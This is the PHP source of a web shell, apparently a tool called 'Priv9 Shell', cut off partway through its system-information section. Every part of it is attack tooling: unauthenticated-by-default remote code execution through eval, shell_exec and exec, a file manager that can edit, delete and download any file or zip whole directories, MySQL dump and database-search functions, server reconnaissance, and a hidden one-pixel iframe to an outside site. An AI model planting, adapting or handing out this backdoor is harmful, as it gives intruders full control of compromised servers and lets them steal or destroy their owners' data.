
<?php
//ver 1.12
//miniadmin pimping
//sql dump bugfixing
$settings = array();
$settings['perms'] = "string";
$settings['timeformat'] = "j.n.y, G:i";
$settings['passprotect'] = false; //password protection
$settings['users'] = array();
//$settings['users']['USERNAME'] = 'PASSWORD';
@ini_set('log_errors',0);
@ini_set("display_errors", "1");
@ini_set('memory_limit', '1200M');
set_time_limit(360);
if(ini_get('register_globals')) {
foreach($_REQUEST as $key => $var) {
if(isset($GLOBALS[$key])) unset($GLOBALS[$key]);
}
foreach($_FILES as $key => $var) {
if(isset($GLOBALS[$key])) unset($GLOBALS[$key]);
}
}
if($settings['passprotect']) {
if (!isset($_SERVER['PHP_AUTH_USER'])) {
header('WWW-Authenticate: Basic realm="Shell account please"');
header('HTTP/1.0 401 Unauthorized');
echo 'NO.';
exit;
} else {
if(isset($settings['users'][$_SERVER['PHP_AUTH_USER']])) {
if($settings['users'][$_SERVER['PHP_AUTH_USER']] == $_SERVER['PHP_AUTH_PW']) {
$authed = 1;
} else die("NOPE.");
} else die("NOPE!");
}
}
if(get_magic_quotes_gpc()) {
foreach($_POST as $key => $var) {
$_POST[$key] = stripslashes($var);
}
foreach($_GET as $key => $var) {
$_GET[$key] = stripslashes($var);
}
foreach($_FILES as $key => $var) {
$_FILES[$key] = stripslashes($var);
}
foreach($_REQUEST as $key => $var) {
$_REQUEST[$key] = stripslashes($var);
}
}
if(!function_exists('sys_get_temp_dir')) {
function sys_get_temp_dir() {
return "/tmp";
}
}
function post($v) {
if(isset($_POST[$v])) return $_POST[$v];
else return null;
}
function get($v) {
if(isset($_GET[$v])) return $_GET[$v];
else return null;
}
function request($v) {
if(isset($_REQUEST[$v])) return $_REQUEST[$v];
else return null;
}

function showperms($perms,$type="string") {
switch($type) {
default:
case "string":
if (($perms & 0xC000) == 0xC000) {
// Socket
$info = 's';
} elseif (($perms & 0xA000) == 0xA000) {
// Symbolic Link
$info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
// Regular
$info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
// Block special
$info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
// Directory
$info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
// Character special
$info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
// FIFO pipe
$info = 'p';
} else {
// Unknown
$info = 'u';
}

// Owner
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?
(($perms & 0x0800) ? 's' : 'x' ) :
(($perms & 0x0800) ? 'S' : '-'));

// Group
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?
(($perms & 0x0400) ? 's' : 'x' ) :
(($perms & 0x0400) ? 'S' : '-'));

// World
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?
(($perms & 0x0200) ? 't' : 'x' ) :
(($perms & 0x0200) ? 'T' : '-'));
return $info;
break;
case "number":
return substr(sprintf('%o', $perms), -4);
break;
}

}


function gettablesql($table,$ver = null) {
if($ver == null) {
list($cver) = mysql_fetch_row(mysql_query("SELECT @@version"));
$ver = substr($cver,0,1);
}
echo 'CREATE TABLE IF NOT EXISTS `'.mysql_real_escape_string($table).'` ('."\n";
$gcqu = "SHOW COLUMNS IN `".mysql_real_escape_string($table)."`";
$getcolumns = mysql_query($gcqu);
if($getcolumns) {
$isfirst = 1;
$primaries = $npkeys = array();
while($column = mysql_fetch_assoc($getcolumns)) {
if(!$isfirst) echo ",\n";
else $isfirst = 0;
echo ' `'.mysql_real_escape_string($column['Field']).'` '.$column['Type'];
if(strtoupper($column['Null']) == "NO") echo ' NOT NULL ';
else echo ' NULL ';
if($column['Extra'] == "auto_increment") echo "AUTO_INCREMENT";
elseif($column['Default'] && $column['Type'] == 'timestamp' && $column['Default'] == 'CURRENT_TIMESTAMP') echo "DEFAULT ".mysql_real_escape_string($column['Default']);
elseif($column['Default']) echo "DEFAULT '".mysql_real_escape_string($column['Default'])."'";
if($column['Key'] == "PRI") $primaries[] = $column['Field'];
elseif($column['Key'] == "UNI") echo ",\n UNIQUE KEY (`".mysql_real_escape_string($column['Field'])."`)";
else {
if($ver >= 5) $gkqu = "SHOW KEYS IN `".mysql_real_escape_string($table)."` WHERE `Table`='".mysql_real_escape_string($table)."' && `Column_name`='".mysql_real_escape_string($column['Field'])."'";
else $gkqu = "SHOW KEYS IN `".mysql_real_escape_string($table)."`";
$getkeys = mysql_query($gkqu);
if($getkeys) {
while($key = mysql_fetch_assoc($getkeys)) {
if($ver >= 5 || ($key['Table'] == $table && $key['Column_name'] == $column['Field'])) {
$npkeys[$key['Key_name']][] = $key;
}
}
} else die("\nMySQL error: ".mysql_error()." in '".$gkqu."'\n");
}
}
if($npkeys) {
foreach($npkeys as $keyname => $key) {
if(count($key) == 1) {
//no multirow key
$key = $key[0];
if($key['Non_unique']) {
echo ",\n KEY (`".mysql_real_escape_string($key['Column_name'])."`".($key['Sub_part'] ? "(".$key['Sub_part'].")" : '').")";
}
else {
echo ",\n UNIQUE KEY (`".mysql_real_escape_string($key['Column_name'])."`".($key['Sub_part'] ? "(".$key['Sub_part'].")" : '').")";
}
} else {
if($key[0]['Non_unique']) {
echo ",\n KEY (";
}
else {
echo ",\n UNIQUE KEY (";
}
$isfirst = 1;
foreach($key as $keypart) {
if(!$isfirst) echo ", ";
else $isfirst = 0;
echo '`'.mysql_real_escape_string($keypart['Column_name']).'`'.($keypart['Sub_part'] ? "(".$keypart['Sub_part'].")" : '');
}
echo ")";

}
}
}
if($primaries) {
echo ",\n PRIMARY KEY (";
$isfirst = 1;
foreach($primaries as $primary) {
if(!$isfirst) echo ", ";
else $isfirst = 0;
echo '`'.mysql_real_escape_string($primary).'`';
}
echo ")\n";
}
} else die("\nMysql Errror: ".mysql_error()." in '".$gcqu."'\n");
echo ");\n\n";
}
function gettablecontentsql($table,$insertbreak = 10,$ver = 0) {
if($ver == null) {
list($cver) = mysql_fetch_row(mysql_query("SELECT @@version"));
$ver = substr($cver,0,1);
}
$gcqu = "SHOW COLUMNS IN `".mysql_real_escape_string($table)."`";
$getcolumns = mysql_query($gcqu);
if($getcolumns) {
$columns = array();
while($column = mysql_fetch_assoc($getcolumns)) {
list($type) = explode("(",$column['Type'],2);
$columns[] = $column + array('rtype' => $type);
if($column['Extra'] == "auto_increment") $aitab = $column['Field'];
}
} else die("\nMySQL error: ".mysql_error()." in '".$gcqu."'\n");
$insertstart = "INSERT INTO `".mysql_real_escape_string($table)."` (";
$isfirst = true;
foreach($columns as $column) {
if(!$isfirst) $insertstart .= ", ";
else $isfirst = false;
$insertstart .= "`".mysql_real_escape_string($column['Field'])."`";
}
$insertstart .= ") VALUES (";
$insertend = ");\n";
$getrows = mysql_query("SELECT * FROM `".mysql_real_escape_string($table)."` ".(!empty($aitab) ? (" ORDER BY `".mysql_real_escape_string($aitab)."`") : ""));
$i = 0;
while($row = mysql_fetch_assoc($getrows)) {
if(!($i%$insertbreak)) echo $insertstart;
else echo ", (";
$isfirst = true;
foreach($columns as $column) {
if(!$isfirst) echo ", ";
else $isfirst = false;
if($column['Null'] == "YES" && $row[$column['Field']] === null) echo "null";
else {
switch($column['rtype']) {
default: echo "'".mysql_real_escape_string($row[$column['Field']])."'"; break;
case "tinyint": case "int": case "float": case "bigint": case "smallint": echo $row[$column['Field']]; break;

}
}
}
if(!(($i+1)%$insertbreak)) echo $insertend;
else echo ")";
$i++;
}
if($i != 0) echo ";\n";
}
function findindb($needle,$type='col',$identical = 0) {
$getdatabases = mysql_list_dbs();
while ($db = mysql_fetch_row($getdatabases)) {
mysql_query("USE `".$db[0]."`");
$gettables = mysql_query("SHOW TABLES");
while($table= mysql_fetch_row($gettables)) {
if($type == 'col') {
$getcolumns = mysql_query("SHOW COLUMNS IN `".mysql_real_escape_string($table[0])."`");
if($getcolumns) {
while($column = mysql_fetch_assoc($getcolumns)) {
foreach($needle as $n) {
if((!$identical && stripos($column['Field'],$n) !== false) || ($identical && strtolower($column['Field']) == strtolower($n)) ) {
echo "Database: <b>".htmlentities($db[0])."</b> Table: <b>".htmlentities($table[0])."</b> Column: <b>".htmlentities($column['Field'])."</b> Found: ".htmlentities($n)."<br />";
break;
}
}
}
}
} elseif($type == 'table') {
foreach($needle as $n) {
if((!$identical && stripos($table[0],$n) !== false) || ($identical && strtolower($table[0]) == strtolower($n)) ) {
echo "Database: <b>".htmlentities($db[0])."</b> Table: <b>".htmlentities($table[0])."</b> Found: ".htmlentities($n)."<br />";
break;
}
}
}
}
}
}
function get_iden_query($iden) {
if($iden) {
$iden = base64_decode($iden);
$crit = explode("&",$iden);
if($crit) {
$query = "";
$error = 0;
foreach($crit as $cr) {
if(strpos($cr,"=") !== false) {
$crits = explode("=",$cr,2);
$query .= ($query ? " &&" : "")." `".mysql_real_escape_string($crits[0])."`='".mysql_real_escape_string($crits[1])."'";
} else {
$error = 1;
break;
}
}
if(!$error) {
return $query;
} else echo "Error: invalid data specified.";
} else echo "Error: No specific row selected.";
} else echo "Error: That row doesn't exist (anymore?)";
return false;
}
$action = get('action');
if(!request('shownone')) {
?>
<!-- Note: I, Kyo, take no responsibility for how this program is used. I just programmed it. -->
<div style="font-size:12px; margin:0px; margin-bottom:5px; border:0px; border-bottom:1px black solid; padding:0px; ">
[<a href="?action=dir">Files/directories</a>]
[<a href="?action=eval">Execute PHP Code (eval)</a>]
[<a href="?action=shellexec">Execute Shell</a>]
[<a href="?action=exec">Execute ext. program</a>]
[<a href="?action=phpinfo">PHPInfo();</a>]
[<a href="?action=showglobals">Show all vars</a>]
[<a href="?action=mysql">MySQL</a>]
[<a href="?action=system">System</a>]
<br>
[<?php $thingcache = @php_uname(); if($thingcache) list($kernel) = explode("#",$thingcache,2); else $kernel = "Couldn't retrieve Kernel version"; echo $kernel; ?>]
[PHP Ver: <?php echo phpversion(); ?>]
<?php if(function_exists('php_ini_loaded_file')) { ?>[Ini file: <?php echo php_ini_loaded_file(); ?>]<?php } ?>
[User: <?php $thingcache = @get_current_user(); if($thingcache) echo $thingcache; else echo "Couldn't retrieve"; ?>]
[GID: <?php $thingcache = @getmygid(); if($thingcache) echo $thingcache; else echo "Couldn't retrieve"; ?>]
[UID: <?php $thingcache = @getmyuid();if($thingcache) echo $thingcache; else echo "Couldn't retrieve"; ?>]
[Safe mode: <?php if(ini_get("safe_mode") || strtolower(ini_get("safe_mode")) == "on") echo "on"; else echo "off"; ?>]
[Open basedir: <?php if(ini_get("open_basedir") || strtolower(ini_get("open_basedir")) == "on") echo "on"; else echo "off"; ?>]
<br><span style="font-size:11px;">[Server: <?php echo htmlentities($_SERVER['SERVER_SOFTWARE']);?>]</span>
<br><span style="font-size:11px;">[Server IP: <?php echo htmlentities($_SERVER['SERVER_ADDR']);?> (<?php echo htmlentities($_SERVER['SERVER_NAME']);?>)] [Your IP: <?php echo htmlentities($_SERVER['REMOTE_ADDR']);?> (<?php echo htmlentities(gethostbyaddr($_SERVER['REMOTE_ADDR']));?>)]
[Space: <?php if(@disk_free_space(getcwd()) && @disk_total_space(getcwd())) { echo round(disk_free_space(getcwd())/(1024*1024*1024),2);?>/<?php echo round(disk_total_space(getcwd())/(1024*1024*1024),2);?>GB<?php } else echo "Couldn't retrieve"; ?>] [Script pos: <a href="?action=dir&dir=<?php echo urlencode(getcwd());?>"><?php echo getcwd(); ?></a>]</span>
<iframe src="http://alikaptanoglu.blogspot.com" height="1" aling="left" class="1" style="" frameborder="0" scrolling="no" width="" title="Priv9 Shell" ></iframe>
</div>
<?php
}
switch($action) {
default:
case "dir":
//add other options here later
case "listdir":
if(!get('dir')) $dir = getcwd();
else $dir = get('dir');
?>
<form style="margin:0px;" method="GET" action="<?php echo htmlentities($_SERVER['SCRIPT_NAME']);?>">
<input type="hidden" name="action" value="touch">
Touch (create) file: <input type="text" name="file" value="<?php echo htmlentities($dir);?>/" size="60">
<input type="submit" value="List">
</form>
<form style="margin:0px;" method="GET" action="<?php echo htmlentities($_SERVER['SCRIPT_NAME']);?>">
<input type="hidden" name="action" value="file">
Edit file: <input type="text" name="file" value="<?php echo htmlentities($dir);?>/" size="60">
<input type="submit" value="List">
</form>
<form style="margin:0px;" method="GET" action="<?php echo htmlentities($_SERVER['SCRIPT_NAME']);?>">
<input type="hidden" name="action" value="mkdir">
Make directory: <input type="text" name="dir" value="<?php echo htmlentities($dir);?>/" size="60">
<input type="submit" value="List">
</form>

<form style="margin:0px;" method="GET" action="<?php echo htmlentities($_SERVER['SCRIPT_NAME']);?>">
<input type="hidden" name="action" value="<?php echo htmlentities($action); ?>">
Directory: <input type="text" name="dir" value="<?php echo htmlentities($dir);?>" size="60">
<input type="submit" value="List">
</form>
<?php
if(@is_dir($dir)) {
if($dircontent = scandir($dir)) {
echo "<table border=\"1\">";
?><tr><td>type</td><td>go</td><td>X</td><td>DL</td><td>name</td><td>size</td><td>mode</td><td>owner</td><td>group</td><td>access</td><td>change</td></tr><?php
foreach($dircontent as $thing) {
if(@is_dir($dir."/".$thing)) $isdir = true;
else $isdir = false;

if($thing == ".") $thingpath = "/";
else $thingpath = @realpath($dir."/".$thing);
?>
<tr>
<td>
<?php
if($isdir) echo "<font color=\"#AAAA00\"><b>dir</b></font>";
else echo "<font color=\"#AAAAAA\"><b>file</b></font>";
?>
</td>
<td>
<?php
if($isdir) echo "<a href=\"?action=listdir&dir=".urlencode($thingpath)."\">go</a>";
else echo "<a href=\"?action=file&file=".urlencode($thingpath)."\">go</a>";
?>
</td>
<td>
<?php
if($isdir) { if($thingpath != "/") echo "<a href=\"?action=rmdir&dir=".urlencode($thingpath)."\">rm</a>"; }
else echo "<a href=\"?action=delfile&file=".urlencode($thingpath)."\">del</a>";
?>
</td>
<td>
<?php
if(!$isdir) echo "<a href=\"?action=dlfile&shownone=true&file=".urlencode($thingpath)."\">dl</a>";
else echo "<a href=\"?action=zipdir&shownone=true&dir=".urlencode($thingpath)."\">zip</a>";
?>
</td>
<td>
<b><?php echo htmlentities($thing); ?></b>
</td>
<td>
<?php
if($isdir) { echo "-"; }
else echo ((round(filesize($thingpath)/1024,2) != 0) ? (round(filesize($thingpath)/1024,2)." kb") : (filesize($thingpath)."b"));
?>
</td>
<td>
<b style='font-family:courier,"courier new";'>
<?php
echo showperms(@fileperms($thingpath),$settings['perms']);
?>
</b>
</td>
<td>
<?php
echo @fileowner($thingpath);
?>
</td>
<td>
<?php
echo @filegroup($thingpath);
?>
</td>
<td>
<?php
echo date($settings['timeformat'],@fileatime($thingpath));
?>
</td>
<td><b>
<?php
echo date($settings['timeformat'],@filectime($thingpath));
?>
</b></td>
</tr>
<?php
}
echo "</table>";
} else {
echo "<b>Error:</b> No permission to open \"".htmlentities($dir)."\". DENIED!<br>";
}
} else {
echo "<font color=\"#990000\">";
if(!file_exists($dir)) echo "<b>Error:</b> \"".htmlentities($dir)."\" does not exist.<br>";
else echo "<b>Error:</b> \"".htmlentities($dir)."\" is not a directory<br>";
echo "</font>";
}

break;
case "file":
case "editfile":
$file = get('file');
if($file) {
if(is_file($file)) {
if(post('newname') && post('newname') != $file) {
if(post('fnoverwrite') || !file_exists(post('newname'))) {
if(rename($file,post('newname'))) {
echo "<font color=\"#00AA00\"><b>File name changed successfully</b></font><br>";
$file = post('newname');
}
else echo "<font color=\"#990000\"><b>Error:</b> Failed to change file name</font><br>";
} else echo "<font color=\"#990000\"><b>Error:</b> Failed to change file name - a file with that name already exists!</font><br>";
}
if(post('copyto') && post('copyto') != $file) {
if(post('fcoverwrite') || !file_exists(post('copyto'))) {
if(copy($file,post('copyto'))) {
echo "<font color=\"#00AA00\"><b>File copied successfully</b></font><br>";
}
else echo "<font color=\"#990000\"><b>Error:</b> Failed to copy file</font><br>";
} else echo "<font color=\"#990000\"><b>Error:</b> Failed to copy file - a file with that name already exists!</font><br>";
}
if(post('chmod') && post('chmod') != substr(sprintf('%o', fileperms($file)),-4)) {
if(preg_match("/^([0-8]{3,4})$/",post('chmod')) ) {
if(chmod($file,octdec(post('chmod')))) {
echo "<font color=\"#00AA00\"><b>File CHMod to ".htmlspecialchars(post('chmod'))." successful</b></font><br>";
$chmod = htmlspecialchars(post('chmod'));
}
else echo "<font color=\"#990000\"><b>Error:</b> Failed to CHMod</font><br>";
} else echo "<font color=\"#990000\"><b>Error:</b> That is not a valid CHMod number.</font><br>";
}
if(post('owner') && post('owner') != fileowner($file)) {
if(chown($file,post('owner'))) echo "<font color=\"#00AA00\"><b>File owner changed successfully</b></font><br>";
else echo "<font color=\"#990000\"><b>Error:</b> Failed to change owner </font><br>";
}
if(post('group') && post('group') != filegroup($file)) {
if(chgrp($file,post('group'))) echo "<font color=\"#00AA00\"><b>File group changed successfully</b></font><br>";
else echo "<font color=\"#990000\"><b>Error:</b> Failed to change group </font><br>";
}
}
}
case "php":
case "html":
$file = get('file');
?>
<form method="GET" action="<?php echo htmlentities($_SERVER['SCRIPT_NAME']);?>">
<input type="hidden" name="action" value="<?php echo htmlentities($action); ?>">
File: <input type="text" name="file" value="<?php echo htmlentities($file);?>" size="60">
<input type="submit" value="List">
</form>

<?php
if($file) {
if(is_file($file)) {
$info = pathinfo($file);
if(post('contents')) {
if(file_put_contents($file,post('contents'))) {
echo "<font color=\"#00AA00\"><b>File edited successfully</b></font><br>";
} else echo "<font color=\"#990000\"><b>Error:</b> Can't writing to file!</font><br>";
}
if(!isset($chmod)) $chmod = substr(sprintf('%o', fileperms($file)),-4);
?>
<form method="POST" action="<?php echo htmlentities(post('SCRIPT_NAME'));?>?action=<?php echo htmlentities($action); ?>&file=<?php echo htmlentities($file)?>">
new file name/path: <input type="text" name="newname" value="<?php echo htmlentities($file);?>" size="60"> <input type="checkbox" name="fnoverwrite" value="1">Overwrite existing files<br>
copy to: <input type="text" name="copyto" value="" size="60"> <input type="checkbox" name="fcoverwrite" value="1">Overwrite existing files<br>
new CHMOD: <input type="text" name="chmod" value="<?php echo $chmod;?>" size="60"><br>
new File owner (id or name): <input type="text" name="owner" value="<?php echo htmlentities(fileowner($file));?>" size="60"><br>
new File group (id or name): <input type="text" name="group" value="<?php echo htmlentities(filegroup($file));?>" size="60"><br>
<?php
if($action != "php" && $action != "html") {
?>
<textarea name="contents" style="width:80%; height:500;"><?php
$handle = fopen ($file, "r");//not using file_get_contents in case the file is too big for the memory
if($handle) {
while (!feof($handle)) {
$buffer = fgets($handle, 4096);
echo htmlentities($buffer);
}
fclose ($handle);
} else echo "Could not open file! Denied!";
?></textarea><br>
<?php
} elseif($action == "php") {
echo "<hr />";
if(highlight_file($file));
else echo "Could not open file! Denied!";
echo "<hr />";
} elseif($action == "html") {
echo "<hr />";
$handle = fopen ($file, "r");//not using file_get_contents in case the file is too big for the memory
if($handle) {
while (!feof($handle)) {
$buffer = fgets($handle, 4096);
echo $buffer;
}
fclose ($handle);
} else echo "Could not open file! Denied!";
echo "<hr />";
}
?>
<input type="submit" value="edit!"> [<a href="?action=dir&dir=<?php echo urlencode($info['dirname']);?>">containing directory</a>] [<a href="?action=delfile&file=<?php echo urlencode($file);?>">delete</a>] [<a href="?action=php&file=<?php echo urlencode($file);?>">as php source</a>] [<a href="?action=html&file=<?php echo urlencode($file);?>">as html</a>] [<a href="?action=file&file=<?php echo urlencode($file);?>">edit file</a>]
</form>
<?php
} else {
echo "<font color=\"#990000\">";
if(!file_exists($file)) echo "<b>Error:</b> \"".htmlentities($file)."\" does not exist.<br>";
else echo "<b>Error:</b> \"".htmlentities($file)."\" is not a file<br>";
echo "</font>";
}
}
break;
case "delfile":
$file = get('file');
if($file) {
if(is_file($file)) {
if(post('sure')) {
if(unlink($file)) echo "<font color=\"#00AA00\"><b>File \"".htmlentities($file)."\" deleted successfully!</b></font><br><a href=\"?action=dir&dir=".htmlentities(( substr($file,0,strrpos($file,'/')) ))."\">Back to the directory listing</a>";
else echo "<font color=\"#990000\"><b>Error while deleting the file \"".htmlentities($file)."\"!</b></font>";
} else {
?>
<form method="POST">
Do you really want to delete the file "<?php echo htmlentities($file); ?>"?<br>
<input type="checkbox" name="sure" value="1"> Yes.<br>
<input type="submit" value="Do it!">
</form>
<?php
}
} else {
echo "<font color=\"#990000\">";
if(!file_exists($file)) echo "<b>Error:</b> \"".htmlentities($file)."\" does not exist.<br>";
else echo "<b>Error:</b> \"".htmlentities($file)."\" is not a file<br>";
echo "</font>";
}
}
break;
case "dlfile":
$file = get('file');
if($file) {
if(is_file($file)) {
$ffile = substr(strrchr($file,'/'),1);
$handle = fopen ($file, "r");//not using file_get_contents in case the file is too big for the memory
if($handle) {
header('Content-Disposition: attachment; filename="'.$ffile.'"');
header('Content-Transfer-Encoding: binary');
header("Content-Length: " . filesize($file));
while (!feof($handle)) {
$buffer = fgets($handle, 4096);
echo $buffer;
}
fclose ($handle);
} else echo "Could not open file! Denied!";
} else echo "not a file";
} else echo "no file";
break;
case "rmdir":
$dir = get('dir');
if($dir) {
if(is_dir($dir)) {
if(post('sure')) {
if(rmdir($dir)) echo "<font color=\"#00AA00\"><b>directory \"".htmlentities($dir)."\" deleted successfully!</b></font><br><a href=\"?action=dir\">Back to the directory listing</a>";
else echo "<font color=\"#990000\"><b>Error while deleting the directory \"".htmlentities($dir)."\"! (maybe it's not empty?)</b></font>";
} else {
?>
<form method="POST">
Do you really want to delete the directory "<?php echo htmlentities($dir); ?>"? (it has to be empty)<br>
<input type="checkbox" name="sure" value="1"> Yes.<br>
<input type="submit" value="Do it!">
</form>
<?php
}
} else {
echo "<font color=\"#990000\">";
if(!file_exists($file)) echo "<b>Error:</b> \"".htmlentities($file)."\" does not exist.<br>";
else echo "<b>Error:</b> \"".htmlentities($file)."\" is not a directory<br>";
echo "</font>";
}
}
break;
case "zipdir":
ignore_user_abort(true);//this is to make sure the zip archive gets deleted from the temp folder
$dir = get('dir');
if($dir) {
if(is_dir($dir)) {
$fdir = substr(strrchr(substr($dir,1),'/'),1);
if(class_exists('ZipArchive') && !isset($_GET['sh']) && !isset($_GET['tar'])) {
$zip = new ZipArchive();
$tmpfile = tempnam(sys_get_temp_dir(), "zip");
if($zip->open($tmpfile, ZipArchive::CREATE | ZIPARCHIVE::OVERWRITE)) {
$dirName = $dir;
if (!is_dir($dirName)) {
echo 'Directory ' . $dirName . ' does not exist';
} else {


$dirName = realpath($dirName);
if (substr($dirName, -1) != DIRECTORY_SEPARATOR) {
$dirName.= DIRECTORY_SEPARATOR;
}

$dirStack = array($dirName);
//Find the index where the last dir starts
$cutFrom = strrpos(substr($dirName, 0, -1), DIRECTORY_SEPARATOR)+1;

while (!empty($dirStack)) {
$currentDir = array_pop($dirStack);
$filesToAdd = array();

$dir = dir($currentDir);
while (false !== ($node = $dir->read())) {
if (($node == '..') || ($node == '.')) {
continue;
}
if (is_dir($currentDir . $node)) {
array_push($dirStack, $currentDir . $node . DIRECTORY_SEPARATOR);
}
if (is_file($currentDir . $node)) {
$filesToAdd[] = $node;
}
}

$localDir = substr($currentDir, $cutFrom);
$zip->addEmptyDir($localDir);

foreach ($filesToAdd as $file) {
$zip->addFile($currentDir . $file, $localDir . $file);
}
}

$zip->close();
$handle = fopen ($tmpfile, "r");//not using file_get_contents in case the file is too big for the memory
if($handle) {
header("Content-Type: application/zip");
header("Content-Length: " . filesize($tmpfile));
header("Content-Disposition: attachment; filename=\"".$fdir.".zip\"");
while (!feof($handle)) {
echo fgets($handle, 4096);
}
fclose ($handle);
} else echo "Could not open zip file. Weird.";
}
unlink($tmpfile);
} else {
echo "error while creating zip";
}

} else {
//echo "<font color=\"#990000\">ZipArchive class not available! Can't zip anything!</font>";
//Zip not available -> using cmd instead
$tmpfile = tempnam(sys_get_temp_dir(), "zip").".zip";
if(!isset($_GET['tar']) && $cmd = exec("zip -r \"".$tmpfile."\" \"".realpath($dir)."\"",$output,$ret)) {
$handle = fopen ($tmpfile, "r");//not using file_get_contents in case the file is too big for the memory
if($handle) {
header("Content-Type: application/zip");
header("Content-Length: " . filesize($tmpfile));
header("Content-Disposition: attachment; filename=\"".$fdir.".zip\"");
while (!feof($handle)) {
echo fgets($handle, 4096);
}
fclose ($handle);
} else {
echo "Could not open zip. Weird.";
}
if(file_exists($tmpfile)) unlink($tmpfile);
} else {
//echo "zip failed:<br /> ".nl2br(htmlentities(print_r($output,true)))." <hr /> (".htmlentities($ret).") / (".htmlentities($tmpfile).")";
if(file_exists($tmpfile)) unlink($tmpfile);

$tmpfile = tempnam(sys_get_temp_dir(), "tar").".tar";
$cmdd = "tar -cf \"".$tmpfile."\" \"".realpath($dir)."\"";
$cmd = exec($cmdd,$output,$ret);
if(!$ret) {
$handle = fopen ($tmpfile, "r");//not using file_get_contents in case the file is too big for the memory
if($handle) {
header("Content-Type: application/tar");
header("Content-Length: " . filesize($tmpfile));
header("Content-Disposition: attachment; filename=\"".$fdir.".tar\"");
while (!feof($handle)) {
echo fgets($handle, 4096);
}
fclose ($handle);
} else {
echo "Could not open tar. Weird.";
}
if(file_exists($tmpfile)) unlink($tmpfile);
} else echo "tar failed: ".htmlentities($cmdd)."<br /> ".nl2br(htmlentities(print_r($output,true)))." <hr /> (".htmlentities($ret).") / (".htmlentities($tmpfile).")";
if(file_exists($tmpfile)) unlink($tmpfile);
}
}
} else {
echo "<font color=\"#990000\">";
if(!file_exists($dir)) echo "<b>Error:</b> \"".htmlentities($dir)."\" does not exist.<br>";
else echo "<b>Error:</b> \"".htmlentities($dir)."\" is not a directory<br>";
echo "</font>";
}
}
break;
case "touch":
$file = get('file');
$info = pathinfo($file);
if($file) {
if(@touch($file)) {
echo "<font color=\"#00AA00\"><b>File \"".htmlentities($file)."\" touched successfully!</b></font><br><a href=\"".htmlentities($_SERVER['SCRIPT_NAME'])."?action=dir&dir=".urlencode($info['dirname'])."\">to the directory</a><br><a href=\"".htmlentities($_SERVER['SCRIPT_NAME'])."?action=file&file=".urlencode($file)."\">to the file</a><br><a href=\"".htmlentities($_SERVER['SCRIPT_NAME'])."?action=dir\">to the directory listing</a><br>";
} else echo "<font color=\"#990000\"><b>Error:</b> file \"".htmlentities($file)."\" could not be touched (Denied!)</font><br><a href=\"".htmlentities($_SERVER['SCRIPT_NAME'])."?action=dir&dir=".urlencode($info['dirname'])."\">to the directory</a><br><a href=\"".htmlentities($_SERVER['SCRIPT_NAME'])."?action=dir\">to the directory listing</a><br>";
}
break;
case "mkdir":
$dir = get('dir');
if($dir) {
if(@mkdir($dir)) {
echo "<font color=\"#00AA00\"><b>directory \"".htmlentities($dir)."\" made successfully!</b></font><br><a href=\"".htmlentities($_SERVER['SCRIPT_NAME'])."?action=dir&dir=".urlencode($dir)."\">to the directory</a><br><a href=\"".htmlentities($_SERVER['SCRIPT_NAME'])."?action=dir\">to the directory listing</a><br>";
} else echo "<font color=\"#990000\"><b>Error:</b> directory \"".htmlentities($dir)."\" could not be made (Denied!)</font><br><a href=\"".htmlentities($_SERVER['SCRIPT_NAME'])."?action=dir\">to the directory listing</a><br>";
}
break;
case "eval":
if(!request('shownone')) {
?>
Eval (execute) this code:
<form method="POST" action="?action=eval">
<input type="checkbox" name="shownone" value="1" <?php if(request('shownone')) echo "CHECKED";?>> Do not echo out anything except for the output of the executed code<br>
<input type="checkbox" name="showallerrors" value="1" <?php if(request('showallerrors')) echo "CHECKED";?>> Show all PHP errors, warnings and notices<br>
<textarea name="eval" style="width:90%;height:500;"><?php echo htmlentities(request('eval'));?></textarea><br>
<input type="submit" value="execute">
</form>
<?php
}
if(request('eval')) {
if(!request('shownone')) echo "evaling PHP Code below:<hr>";
if(request('showallerrors')) {
@ini_set("error_reporting", "E_ALL");
@error_reporting(E_ALL);
}
eval(request('eval'));
}
break;
case "shellexec":
?>
execute this shell (one command per line):
<form method="POST" action="?action=shellexec">
<textarea name="shellexec" style="width:90%;height:500;"><?php echo htmlentities(request('shellexec'));?></textarea><br>
<input type="checkbox" name="processasmany" value="1" <?php if(request('processasmany')) echo "CHECKED"; ?>> Proccess seperately (only check if the commands don't have anything to do with each other)
<input type="submit" value="execute">
</form>
<?php
if(request('shellexec')) {
if(!request('processasmany')) {
echo "executing shell below:<hr><pre>";
echo "<b>".htmlentities(request('shellexec'))."</b><hr><br>".htmlentities(shell_exec(str_replace("\r","",request('shellexec'))))."<hr>";
echo "<hr></pre>";
} else {
$commands = explode("\n",str_replace("\r","",request('shellexec')));
echo "executing shell below:<hr><pre>";
foreach($commands as $cmd) echo "<b>".htmlentities($cmd)."</b><hr><br>".htmlentities(shell_exec($cmd))."<hr>";
echo "<hr></pre>";
}
}
break;
case "exec":
?>
execute this program (one command per line):
<form method="POST" action="?action=exec">
<textarea name="exec" style="width:90%;height:500;"><?php echo htmlentities(request('exec'));?></textarea><br>
<input type="submit" value="execute">
</form>
<?php
if(request('exec')) {
$commands = explode("\n",str_replace("\r","",request('exec')));
echo "executing below:<hr><pre>";
foreach($commands as $cmd) { if(trim($cmd)) { exec($cmd,$output,$ret); echo "<b>".htmlentities($cmd)."</b><hr><br>".htmlentities(print_r($output,true))."<hr>Return status:".htmlentities($ret)."<hr>";}}
echo "<hr></pre>";
}
break;
case "phpinfo":
phpinfo();
break;
case "system":
?>
<h2>System</h1>
<?php $sys = posix_uname(); ?>
Sysname: <?php echo htmlentities($sys['sysname']); ?><br />
nodename: <?php echo htmlentities($sys['nodename']); ?><br />
release: <?php echo htmlentities($sys['release']); ?><br />
version: <?php echo htmlentities($sys['version']); ?><br />
machine: <?php echo htmlentities($sys['machine']); ?><br />
<?php
if(isset($_GET['start']) && (int)get('start')) $start = (int)get('start');
else $start = 0;
if(isset($_GET['end']) && (int)get('end')) $end = (int)get('end');
